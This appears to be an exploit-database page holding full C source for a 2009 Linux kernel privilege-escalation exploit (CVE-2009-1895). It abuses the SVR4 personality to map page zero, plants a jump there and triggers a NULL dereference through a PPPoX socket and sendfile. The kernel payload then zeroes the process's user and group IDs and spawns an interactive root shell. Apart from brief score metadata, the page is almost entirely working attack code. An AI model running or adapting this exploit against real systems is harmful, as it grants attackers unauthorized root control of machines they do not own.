Linux Kernel PER_CLEAR_ON_SETID personality bypass

2009-09-1800:00:00

Root

www.seebug.org

0.001 Low

EPSS

Percentile

24.9%

JSON

No description provided by source.


                                                /*
* 14.08.2009, babcia padlina
*
* vulnerability discovered by google security team
*
* some parts of exploit code borrowed from vmsplice exploit by qaaz
* per_svr4 mmap zero technique developed by Julien Tinnes and Tavis Ormandy:
*     http://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/
*/

#include &lt;stdio.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;sys/user.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;inttypes.h&gt;
#include &lt;sys/reg.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;sys/personality.h&gt;

static unsigned int uid, gid;

#define USER_CS    0x73
#define USER_SS    0x7b
#define USER_FL    0x246
#define STACK(x) (x + sizeof(x) - 40)

void exit_code();
char exit_stack[1024 * 1024];

static inline __attribute__((always_inline)) void *get_current()
{
unsigned long curr;
__asm__ __volatile__ (
&quot;movl %%esp, %%eax ;&quot;
&quot;andl %1, %%eax ;&quot;
&quot;movl (%%eax), %0&quot;
: &quot;=r&quot; (curr)
: &quot;i&quot; (~8191)
);
return (void *) curr;
}

static inline __attribute__((always_inline)) void exit_kernel()
{
__asm__ __volatile__ (
&quot;movl %0, 0x10(%%esp) ;&quot;
&quot;movl %1, 0x0c(%%esp) ;&quot;
&quot;movl %2, 0x08(%%esp) ;&quot;
&quot;movl %3, 0x04(%%esp) ;&quot;
&quot;movl %4, 0x00(%%esp) ;&quot;
&quot;iret&quot;
: : &quot;i&quot; (USER_SS), &quot;r&quot; (STACK(exit_stack)), &quot;i&quot; (USER_FL),
&quot;i&quot; (USER_CS), &quot;r&quot; (exit_code)
);
}

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i &lt; 1024-13; i++) {
if (p[0] == uid &amp;&amp; p[1] == uid &amp;&amp; p[2] == uid &amp;&amp; p[3] == uid &amp;&amp; p[4] == gid &amp;&amp; p[5] == gid &amp;&amp; p[6] == gid &amp;&amp; p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0) {
fprintf(stderr, &quot;failed\n&quot;);
exit(-1);
}

execl(&quot;/bin/sh&quot;, &quot;sh&quot;, &quot;-i&quot;, NULL);
}

int main(void) {
char template[] = &quot;/tmp/padlina.XXXXXX&quot;;
int fdin, fdout;
void *page;

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

if ((personality(0xffffffff)) != PER_SVR4) {
if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror(&quot;mmap&quot;);
return -1;
}
} else {
if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) &lt; 0) {
perror(&quot;mprotect&quot;);
return -1;
}
}

*(char *)0 = '\x90';
*(char *)1 = '\xe9';
*(unsigned long *)2 = (unsigned long)&amp;kernel_code - 6;

if ((fdin = mkstemp(template)) &lt; 0) {
perror(&quot;mkstemp&quot;);
return -1;
}

if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) &lt; 0) {
perror(&quot;socket&quot;);
return -1;
}

unlink(template);
ftruncate(fdin, PAGE_SIZE);
sendfile(fdout, fdin, NULL, PAGE_SIZE);
}

0.001 Low

EPSS

Percentile

24.9%

JSON

Related for SSV:12354